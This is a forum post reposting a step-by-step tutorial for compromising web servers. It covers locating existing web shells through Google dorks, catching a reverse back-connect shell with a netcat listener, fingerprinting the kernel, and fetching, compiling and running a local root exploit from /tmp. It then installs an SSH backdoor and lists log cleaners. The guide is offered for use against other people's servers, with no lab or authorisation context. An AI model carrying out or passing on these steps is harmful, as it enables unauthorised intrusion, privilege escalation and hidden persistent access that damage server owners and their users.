Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Rooting a Web Server with Netcat and a Shell
Here's a simple tutorial I found on the internet, I didn't write it myself. I tried to correct most grammar errors, but let me know if I missed any. It relies on third party exploits and a shell, so don't expect much from it. But please reply/thank.

Things You Need:
# A Shell on a Website
# An Exploit
# Log cleaner
# SSH Backdoor
# Netcat

Use Google Dorks to find shells.
Once you find a shell, open command prompt, and go to NetCat Path, Type
"cd netcat.exe"

ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "WSO 2.3" or Any other
thats your choice....

Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.

now came back to netcat and type "nc -l -v -p 2121"

it will give you this output:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...

Getting a Right exploit for the servers

Type : Uname -a & hit enter.
It'll look something like this:

[[email protected] /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

You have noted, It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.

You need to find a perfect exploit for it. you can find them at:-

Compiling & executing exploits

Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.

Before proceeding further, Cd into the tmp directory, because it is always writable. So type: Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.

So first I'll get the exploit on the server, So I type : Wget
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this:-

[email protected] /home/target_usernemr/public_html/tmp]$ wget
--2011-01-25 08:21:43--
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'

now change the permission of the exploit to 777.
Type: "Chmod 777 exploit.c"

Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit

Next step is to execute it So we'll type: "./exploit"

here it'll show different process...
: #
: #
got root you m0f0 !! [<example]

Now it say got root. Let's Check is it true,
Type: "whoami"

then it will say "root"

like: uid=0(root) gid=0(root) groups=0(root)

Type "su" to get full privileges!

Installing Backdoors
type: "Wget"

Then type,
cd sshdoor

Now connect with PuTTy and enjoy root privileges.

Methods to execute exploits written in other languages:
C exploit
gcc -o exploit exploit.c
chmod +x exploit

Perl Exploits


php exploit.php

Forum Jump:

Users browsing this thread: 1 Guest(s)